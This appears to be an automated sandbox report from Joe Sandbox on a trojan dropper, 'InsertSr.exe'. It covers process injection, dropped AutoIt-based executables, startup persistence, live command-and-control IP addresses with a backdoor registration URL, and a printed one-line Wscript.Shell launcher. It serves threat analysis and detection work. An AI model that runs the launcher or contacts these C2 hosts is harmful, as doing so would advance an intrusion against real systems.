extension 21->75 77 Injects a PE file into a foreign processes 21->77 34 Intranet.pif 1 21->34         started        38 cmd.exe 2 21->38         started        59 109.172.87.135, 22016, 49730 SUMTEL-AS-RIPEMoscowRussiaRU Russian Federation 29->59 79 Found Tor onion address 29->79 file11 signatures12 process13 dnsIp14 53 188.130.206.243, 49724, 49729, 49735 SVINT-ASNES Russian Federation 34->53 55 91.212.166.91, 49723, 49728, 49734 MOBILY-ASEtihadEtisalatCompanyMobilySA United Kingdom 34->55 57 3 other IPs or domains 34->57 73 Found Tor onion address 34->73 47 C:\Users\user\AppData\...\Virtuoso.url, MS 38->47 dropped 41 conhost.exe 38->41         started        file15 signatures16 process17

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      InsertSr.exe16%ReversingLabsWin32.Trojan.Generic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr8%ReversingLabs
      C:\Users\user\AppData\Local\Temp\316094\Intranet.pif8%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://91.212.166.91188.130.206.243:80P0%Avira URL Cloudsafe
      http://188.130.206.243http://46.8.232.1060%Avira URL Cloudsafe
      http://93.185.159.253P0%Avira URL Cloudsafe
      http://188.130.206.2430%Avira URL Cloudsafe
      http://188.130.206.243X-Content-Type-OptionsP.0%Avira URL Cloudsafe
      http://188.130.206.243/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUi
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://46.8.232.106/false
          high
          http://46.8.236.61/false
            high
            http://93.185.159.253/false
              high
              http://188.130.206.243/false
              • Avira URL Cloud: safe
              unknown
              http://91.212.166.91/false
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/JInsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000000.2154258238.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Virtuoso.scr, 00000011.00000000.2289162050.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Intranet.pif, 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Virtuoso.scr, 00000016.00000000.2724020520.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drfalse
                  high
                  http://46.8.232.106Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    http://91.212.166.91188.130.206.243:80PVirtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://188.130.206.243http://46.8.232.106Intranet.pif, 00000013.00000002.3383490052.000000000A0EE000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F0000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://188.130.206.243Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://93.185.159.253Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpfalse
                      high
                      http://46.8.236.61Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        http://nsis.sf.net/NSIS_ErrorErrorInsertSr.exefalse
                          high
                          http://93.185.159.253PIntranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A12C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.autoitscript.com/autoit3/InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drfalse
                            high
                            http://188.130.206.243X-Content-Type-OptionsP.Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://91.212.166.91Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              46.8.232.106
                              unknownRussian Federation
                              28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                              188.130.206.243
                              unknownRussian Federation
                              200509SVINT-ASNESfalse
                              109.172.87.135
                              unknownRussian Federation
                              41691SUMTEL-AS-RIPEMoscowRussiaRUtrue
                              93.185.159.253
                              unknownRussian Federation
                              39912I3B-ASATfalse
                              91.212.166.91
                              unknownUnited Kingdom
                              35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                              46.8.236.61
                              unknownRussian Federation
                              28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1565338
                              Start date and time:2024-11-29 16:23:15 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 3s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:23
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:InsertSr.exe
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@32/21@3/6
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 33
                              • Number of non-executed functions: 368
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target Intranet.pif, PID 1292 because there are no executed function
                              • Execution Graph export aborted for target Virtuoso.scr, PID 2404 because there are no executed function
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: InsertSr.exe
                              TimeTypeDescription
                              10:24:11API Interceptor8x Sleep call for process: Intranet.pif modified
                              10:24:26API Interceptor9x Sleep call for process: Virtuoso.scr modified
                              16:24:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              46.8.232.106iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
                              Week11.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106/
                              188.130.206.243iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
                              Week11.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243/
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SVINT-ASNESx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 188.130.200.151
                              iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              Week11.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                              • 188.130.206.243
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 188.130.206.243
                              FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsiKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.236.61
                              ppc.elfGet hashmaliciousMiraiBrowse
                              • 46.8.228.104
                              file.exeGet hashmaliciousCryptbotBrowse
                              • 46.8.237.112
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 46.8.237.112
                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • 46.8.237.112
                              Week11.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.236.61
                              Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.236.61
                              m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.236.61
                              https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                              • 46.8.232.106
                              SecuriteInfo.com.FileRepMalware.3248.17662.exeGet hashmaliciousUnknownBrowse
                              • 46.8.237.66
                              SUMTEL-AS-RIPEMoscowRussiaRUiKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                              • 109.172.88.38
                              7rfw2HqJjJ.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 109.172.94.66
                              RafaelConnect.exeGet hashmaliciousUnknownBrowse
                              • 89.221.225.227
                              RafaelConnect.exeGet hashmaliciousUnknownBrowse
                              • 89.221.225.227
                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 109.172.94.66
                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 109.172.94.66
                              sh4.elfGet hashmaliciousUnknownBrowse
                              • 87.117.138.145
                              yakuza.i686.elfGet hashmaliciousUnknownBrowse
                              • 178.130.55.72
                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                              • 109.172.60.44
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 109.172.88.38
                              I3B-ASATWeek11.exeGet hashmaliciousGO BackdoorBrowse
                              • 93.185.159.253
                              Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                              • 93.185.159.253
                              XWHcHAzqPR.exeGet hashmaliciousUnknownBrowse
                              • 195.16.240.249
                              byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                              • 195.16.237.179
                              m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                              • 93.185.159.253
                              https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                              • 93.185.159.253
                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                              • 195.16.243.93
                              SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                              • 93.185.159.253
                              https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                              • 93.185.159.253
                              BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                              • 93.185.159.253
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrvqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                  fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                      qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                        eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                          file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                            file.exeGet hashmaliciousXWormBrowse
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                  C:\Users\user\AppData\Local\Temp\316094\Intranet.pifvqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                                    fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                      fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                        qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                            eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                              file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                file.exeGet hashmaliciousXWormBrowse
                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                      Process:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):7042413
                                                                      Entropy (8bit):7.999973722573661
                                                                      Encrypted:true
                                                                      SSDEEP:196608:uV4QJVZB9GvmVt8iDJ21EJsTuMb5sk3/4mD5UK:w4KRVtV921EJSu8iknx
                                                                      MD5:C4959BED137FD2E510CE19330623A16A
                                                                      SHA1:20AA56927D0563CE4EA72483B7205A58B8414E17
                                                                      SHA-256:E2AFAB12762BC0DEAFF044721F64D322A21E1A35F8054DE5C2E488E5EFA33208
                                                                      SHA-512:A34D1C63FCE327AC1E75E6FFDB85EDA74591982339FB60FD96407BE82714BBAEA27E2A7F288BAB405562572962A3772F2F0603B8474408D464CCCBA038666764
                                                                      Malicious:false
                                                                      Preview:N..Ms!......=,.j.%...=.up..._?A...Oa.6.r,.:g....k...C........bn..1uf...>..B.*o.....e.A.......I.._~=6a....U....(.Q.T..V.d.i.....}.B.J0./..R..|.c....YR..p..'..\.2..... ... ../Qp.N..#....3..... d........1.[A.rS....w.......w.$.k.Sr.|....V..S..r.?.2U..:....&..I.vW.f!...[.77.Vc..o't..E8....p.7}xc!1rM../..r..`...b......e.5,Aeb..+42:vQ=DrK.5L,.Nv..........b,.I.4.T..^..fM>..h.....!.......A....V.....*..#;...!.%.Z6(..A1\. NV-{..o...).1.~o1s....x..ze...L.....et...A.1....n....51.i..H..,...bA.a..........QI......v..Q..Tl..b.D...fV.........,w..Um.L}..>.9..<c..3=..|!..-(...P.P....P..D .c.n.....].5...o,O.t...K..8<..%.po.#4w.b%_'R;Z...lbyW....J....O=8 .aR.:.m.NX...T...5/.5.i3G.@........-+1...\..8:l..........:O.-.H....J.d...gg.L..J...../.......e%.E.Uq....<.+...+.R...+.{s!..v.V.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H..
                                                                      Process:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):187
                                                                      Entropy (8bit):4.622268306964676
                                                                      Encrypted:false
                                                                      SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5s12TrABDc1FZo5uWAX+eLCMuL4EkD5s12t:RiJBJHonwWDeLPqJkDRABDsFywWDeLPp
                                                                      MD5:29DF653FF635132CD3766BBCE1240C5E
                                                                      SHA1:1827AD4C0A40430C70F11D8794493C44B379B0DF
                                                                      SHA-256:CD44A6B65BBFB205987C90C2CBEC8B59867C3DEE3AB71A27BBBC4C8318D5A5E7
                                                                      SHA-512:833A142D3D807FE4A451C2613F9B28D3C67844BE9E737CAB59A5CD93B67035AF5F22B5A4BAB788DF967209EB587788895C5CD6885695D5DA93950607E07867F2
                                                                      Malicious:true
                                                                      Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\Immersive Creations Co\\Virtuoso.scr\" \"C:\\Users\\user\\AppData\\Local\\Immersive Creations Co\\D\"")
                                                                      Process:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.62028134425878
                                                                      Encrypted:false
                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Joe Sandbox View:
                                                                      • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: eddzD2MA12.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.62028134425878
                                                                      Encrypted:false
                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Joe Sandbox View:
                                                                      • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: eddzD2MA12.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):7042413
                                                                      Entropy (8bit):7.999973722573661
                                                                      Encrypted:true
                                                                      SSDEEP:196608:uV4QJVZB9GvmVt8iDJ21EJsTuMb5sk3/4mD5UK:w4KRVtV921EJSu8iknx
                                                                      MD5:C4959BED137FD2E510CE19330623A16A
                                                                      SHA1:20AA56927D0563CE4EA72483B7205A58B8414E17
                                                                      SHA-256:E2AFAB12762BC0DEAFF044721F64D322A21E1A35F8054DE5C2E488E5EFA33208
                                                                      SHA-512:A34D1C63FCE327AC1E75E6FFDB85EDA74591982339FB60FD96407BE82714BBAEA27E2A7F288BAB405562572962A3772F2F0603B8474408D464CCCBA038666764
                                                                      Malicious:false
                                                                      Preview:N..Ms!......=,.j.%...=.up..._?A...Oa.6.r,.:g....k...C........bn..1uf...>..B.*o.....e.A.......I.._~=6a....U....(.Q.T..V.d.i.....}.B.J0./..R..|.c....YR..p..'..\.2..... ... ../Qp.N..#....3..... d........1.[A.rS....w.......w.$.k.Sr.|....V..S..r.?.2U..:....&..I.vW.f!...[.77.Vc..o't..E8....p.7}xc!1rM../..r..`...b......e.5,Aeb..+42:vQ=DrK.5L,.Nv..........b,.I.4.T..^..fM>..h.....!.......A....V.....*..#;...!.%.Z6(..A1\. NV-{..o...).1.~o1s....x..ze...L.....et...A.1....n....51.i..H..,...bA.a..........QI......v..Q..Tl..b.D...fV.........,w..Um.L}..>.9..<c..3=..|!..-(...P.P....P..D .c.n.....].5...o,O.t...K..8<..%.po.#4w.b%_'R;Z...lbyW....J....O=8 .aR.:.m.NX...T...5/.5.i3G.@........-+1...\..8:l..........:O.-.H....J.d...gg.L..J...../.......e%.E.Uq....<.+...+.R...+.{s!..v.V.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H..
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):738304
                                                                      Entropy (8bit):7.999753098638204
                                                                      Encrypted:true
                                                                      SSDEEP:12288:QxtXQU/qjySgw7bfixzEekvoaLaW1N8oSJcAj9SG0YSXwq63+mI+eyUu6WRx2zo+:QfgUSGnw7bCzfha2mN8okhSXYSX8ZeZf
                                                                      MD5:44A5825233B5A360E932CFE68E9FEEDF
                                                                      SHA1:2A3B1AF094F7C2B9A521C22C8EE8765630ECF4B7
                                                                      SHA-256:7C327D77A5331CF24562249717F8709BDDCF71327F824EE8B4842E57CC67BD40
                                                                      SHA-512:FCC654899E1084551AA7E95229DA507677590DD23338AB32465B18019EEEC5016F1B888CEB37E749DEA8256F261960C21F9A5FA3718CAC93E96C257923CA89C3
                                                                      Malicious:false
                                                                      Preview:....tn0..O_&!.1.....K.I..}...4..h.w...C...d...bOzv..=.H..]7.$...!c"Z..Y:ZL........6T3...Nn......M-g..{.D.|...%yWMb.$..R1.pE....Td.gv..v..[.J...V.0}{(...{..e`rNV..h..p-....fR...jIL..~z.B..?..?.'.H... 2...!...k.r.c.}.A`....i.:~&.M.q.(M.EJV9..E._.X.d..j9_..s..Z9h....P..o.$..../N]..|..t..s...w.0..".).$%.K%..c9...6.W...h.+.GI..o.}LT...u.]..V.R..../.>.Es%>?....&.97y.............D..C8O.Ohef@..!#.'...\.zu...\.Fl.U..s.../.L.)..:.gs.ON..o........v...D....RE...m....B..`......z.#..Q.-...w.@..@2...;H.....[$5...q.u...c.p`...eZ'.f.j7wt....t....H..uKah|C...:............#A~...-.}...5j.T.....X....Px.P.:...dg^...<.?..=..gW..+W..Lu...".z?...G-.bO),t...P.._@......#.G.C..z1xZ....Hu+.......F8@..V.F.IJVa.g......"=D...2..S....A.H.s.:rGI..*bcv..5......3} .....#...z.CF!.H.....>.............(.-..H.........^...l.,.,m7..w....V%....&.S...'...B....*...,...Q@....c,;..+.>....Q...d...G......B>lz.p.6|.....'b.g...a...~.......w.]..$..TR.O.C0mNd.r.{J.].l..W..>.lq.P.Z..;yR.T
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:ASCII text, with very long lines (376), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9945
                                                                      Entropy (8bit):5.17404966843657
                                                                      Encrypted:false
                                                                      SSDEEP:192:LVnJWezHSpuHD4O6FKgImRV5OM5YuDkTpM6nHgzPMj0kWtj7mqGSwDqcBJ:LVnWpuHqfRBWuoT3edkI7mq7w2aJ
